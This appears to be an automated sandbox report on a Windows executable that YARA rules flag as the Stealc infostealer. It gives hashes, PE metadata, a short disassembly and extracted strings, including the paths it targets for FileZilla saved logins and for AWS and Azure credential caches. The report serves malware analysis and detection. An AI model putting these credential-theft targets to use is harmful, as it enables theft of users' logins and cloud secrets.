                  SHA1:1FBF8D2D4CFC584A290AC1B035A33C5659F49FA6
                  SHA-256:B28E6406EB281EC58BF1781ABFF40F92AD14EA9E332CACF5B4B86C3A30390FBF
                  SHA-512:4C907A2693E2A8F3B512DAABEE44D35E7241D5AEC13309BC4174B8999A854D03ECE1AA51D7664EDD7755A97121A3C50F1F3CE822F7798559086306F865A35FAB
                  Malicious:false
                  Reputation:low
                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~]...(..............................................................................................................................................................................................................................................................................................................................................H.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.587835052916894
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:314'368 bytes
                  MD5:8695564cd767158ca851e966afaea1be
                  SHA1:9e09cc44a9690ddc846a3d0b850fe324db91b721
                  SHA256:a73bfdae65dadc72f634652cbd12579f0f57448a2cd52d34b4892a937bba6126
                  SHA512:7ab2e14d9b34146c8c03cc4b2c99e1cb6cd3ef7de2274fb9c23e633316051e66cd5d1c070aa37b8625586075a20be6bf9fa04825facef57eb49a50470ce75b02
                  SSDEEP:6144:2Ei8gYtUokCulxMfpbSGePV0zxqgFIp5cn5nGusLJ+mzxCC:jtUoH3IGgV04gFWk5nGNLFzxCC
                  TLSH:8C649D31F641487ED68302BD619EAF3EDE76A9160310CCD793D05DA426F42F2A935A2F
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........
                  Icon Hash:90cececece8e8eb0
                  Entrypoint:0x4169f0
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:
                  Instruction
                  push ebp
                  mov ebp, esp
                  sub esp, 4Ch
                  call 00007F3C008F41FAh
                  call 00007F3C0090B7F5h
                  push 00420AEFh
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007F3C0090C6C8h
                  call 00007F3C008F3153h
                  call 00007F3C008F30DEh
                  call 00007F3C008F3089h
                  call 00007F3C008F3194h
                  call 00007F3C009086DFh
                  call 00007F3C008F30FAh
                  call 00007F3C009097B5h
                  push eax
                  lea eax, dword ptr [ebp-4Ch]
                  push eax
                  push 00421110h
                  lea ecx, dword ptr [ebp-40h]
                  push ecx
                  call 00007F3C00909832h
                  push eax
                  lea edx, dword ptr [ebp-34h]
                  push edx
                  push 0042110Ch
                  lea eax, dword ptr [ebp-28h]
                  push eax
                  mov ecx, dword ptr [0064A540h]
                  push ecx
                  lea edx, dword ptr [ebp-1Ch]
                  push edx
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007F3C0090C8E1h
                  mov ecx, eax
                  call 00007F3C0090C8DAh
                  mov ecx, eax
                  call 00007F3C0090C8D3h
                  mov ecx, eax
                  call 00007F3C0090C8CCh
                  mov ecx, eax
                  call 00007F3C0090C8C5h
                  push eax
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007F3C0090C7ACh
                  lea ecx, dword ptr [ebp-4Ch]
                  call 00007F3C0090C704h
                  lea ecx, dword ptr [ebp-40h]
                  call 00007F3C0090C6FCh
                  lea ecx, dword ptr [ebp-34h]
                  call 00007F3C0090C6F4h
                  lea ecx, dword ptr [ebp-28h]
                  call 00007F3C0090C6ECh
                  lea ecx, dword ptr [ebp-1Ch]
                  call 00007F3C0090C6E4h
                  mov eax, 00000001h
                  test eax, eax
                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [LNK] VS2010 build 30319
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2aa280x3c.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x25c0000x24e0.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x1e0000x104.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x1cc8f0x1ce00fb22f0b514c5db684208b2499bd77bdbFalse0.4681750541125541Matlab v4 mat-file (little endian) \352\316A, numeric, rows 4316256, columns 06.092231741918131IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rdata0x1e0000xcf8c0xd000732837f5aaecdff037ef74441bb0a3eeFalse0.5279634915865384data6.659998187691008IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x2b0000x2303a40x1e4006b183f83d278d8208a03ee7e3cbf838eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .reloc0x25c0000x459e0x46007f93d7276b928e946c8185ceefd82424False0.5563058035714286data6.437243687517982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  No network behavior found

                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:12:51:55
                  Start date:27/10/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x400000
                  File size:314'368 bytes
                  MD5 hash:8695564CD767158CA851E966AFAEA1BE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000000.1677009646.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false

                  Target ID:3
                  Start time:12:51:55
                  Start date:27/10/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 168
                  Imagebase:0xce0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Reset < >
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 021OTKHJ7TL$0BGDHM9BC4G2H3420KF7$2NT3UR$2T8033P3KK93$32ISMD934$54YY1JOO$5YYWNEPNXQNSHZ3ON4GK$7AT_"a)-?$8T5M0GNJQQAUCUPYGOZE$8XPFFV33DMU0$9LSY0RL2ILTGHUS46S1U$9M3BL5MTFXR$A=7R;4$BPNCHSQTJ$C58OPCCHD60$CK6BSOT5ZREN9$CSVO916W9$CZBMT$ECC0AD71CI6E$F49M5L3AA3$GA7UNGPL8RX3$ITQ4BKZ75OYV93$IX0PKDWZ4EHQSM$KSL7F93BENOJU9XYV7$NA2MZZJC060$QRC6L0IPXZ0IDN4B$RJU5ODZ967Y6$RUPS7DKWGME$TMRVHYFQ$TVDPNVXO$U4FMQ8JTS6Q9S$UPQDL6SWIRKI$VEDEJA$W930UY3$WP6B64HMI0$X5LMIIPI8H1ML$Y2VHXS3R7$Y503NOMAS$Y<&'6?$YJJRRF5$ZMYLOTG5UO1GD60BU$ZQ5DXRH84BD5268$f]M`u+6ga^E$u1Le@V"}*&\r
                    • API String ID: 0-4117208749
                    • Opcode ID: 2e131ac107b5869dcf288ea33e285aa41183704a9f8f5d9749862df1f2e8ba1b
                    • Instruction ID: 9b119d3ceed4079f7c340c173e49dc1c63a0adcf564766473d671775b05f69f7
                    • Opcode Fuzzy Hash: 2e131ac107b5869dcf288ea33e285aa41183704a9f8f5d9749862df1f2e8ba1b
                    • Instruction Fuzzy Hash: 3891C9B9FD0320BEE3106BE27D03F243A9197B1F49FA5113BFA04692E2F6E91514465E
                    Strings
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                    • SF0LUNB9OE6XC, xrefs: 004045D2
                    • Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                    • F0TWHCR2F6Z9, xrefs: 004045F3
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                    • er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                    • olo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                    • er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                    • OADZU5, xrefs: 004045C7
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                    • er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                    • er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                    • A6UYB6E9WDSYQWYMHCU4LGBUVKRZVFVYF1HL8OK8I28F85SG, xrefs: 004045DD
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                    • ianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                    • er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                    • nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: A6UYB6E9WDSYQWYMHCU4LGBUVKRZVFVYF1HL8OK8I28F85SG$Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$F0TWHCR2F6Z9$OADZU5$SF0LUNB9OE6XC$er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$er and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$nded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$olo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 0-2182738262
                    • Opcode ID: 7ec8420cb7fbb92e3b9dac634e6e561209ac50f0bb2ad10c25cf711909d82004
                    • Instruction ID: 0478123035047c0a4e6da9b6409727c73bcdf1cfa19446a39dded10aa011e9d1
                    • Opcode Fuzzy Hash: 7ec8420cb7fbb92e3b9dac634e6e561209ac50f0bb2ad10c25cf711909d82004
                    • Instruction Fuzzy Hash: C041BB79740624EBC7189FE5FC8DB987F60AB4C712BA0C062F90299190CBF9D5019B3D
                    Strings
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004019EE
                    • st Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401898
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401B86
                    • rt pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401881
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401C3F
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401AA6
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004019D7
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004017F1
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004019BD
                    • ish-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401967
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401B6F
                    • ZZ53F0TWHCR2F6Z9, xrefs: 00401808
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00401ABD
                    • founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040197D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$ZZ53F0TWHCR2F6Z9$ish-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$rt pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$st Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 0-2400977591
                    • Opcode ID: 8eb6a25d104e9b810a5064ab52aa8f5da5954ef80762faaeed8dc5af51a7872a
                    • Instruction ID: 39d00e11cde3818330ac08f623c81c852c64dcafcc1d6f8b5eceb62ce14d4984
                    • Opcode Fuzzy Hash: 8eb6a25d104e9b810a5064ab52aa8f5da5954ef80762faaeed8dc5af51a7872a
                    • Instruction Fuzzy Hash: F51260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                    • API String ID: 0-514892060
                    • Opcode ID: 5617bd6bc83757f25327082bfbfb60fa8d0a6348b7b524702c500f70768eef60
                    • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                    • Opcode Fuzzy Hash: 5617bd6bc83757f25327082bfbfb60fa8d0a6348b7b524702c500f70768eef60
                    • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                    • API String ID: 0-817767981
                    • Opcode ID: c3ad0e5f37a6afd264e19c98f003c489031be70fef7a74d9d5741692706db697
                    • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                    • Opcode Fuzzy Hash: c3ad0e5f37a6afd264e19c98f003c489031be70fef7a74d9d5741692706db697
                    • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                    • API String ID: 0-974132213
                    • Opcode ID: 63500b277e5d8c6ba40ed9413d1edfa83572fad66260e383529a6b6b95d2c298
                    • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                    • Opcode Fuzzy Hash: 63500b277e5d8c6ba40ed9413d1edfa83572fad66260e383529a6b6b95d2c298
                    • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                    APIs
                    • __getptd.LIBCMT ref: 0041C74E
                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                    • __getptd.LIBCMT ref: 0041C765
                    • __amsg_exit.LIBCMT ref: 0041C773
                    • __lock.LIBCMT ref: 0041C783
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                    Strings
                    • cdefghijklmnopqrstuvwxyz, xrefs: 0041C755
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID: cdefghijklmnopqrstuvwxyz
                    • API String ID: 938513278-2004723410
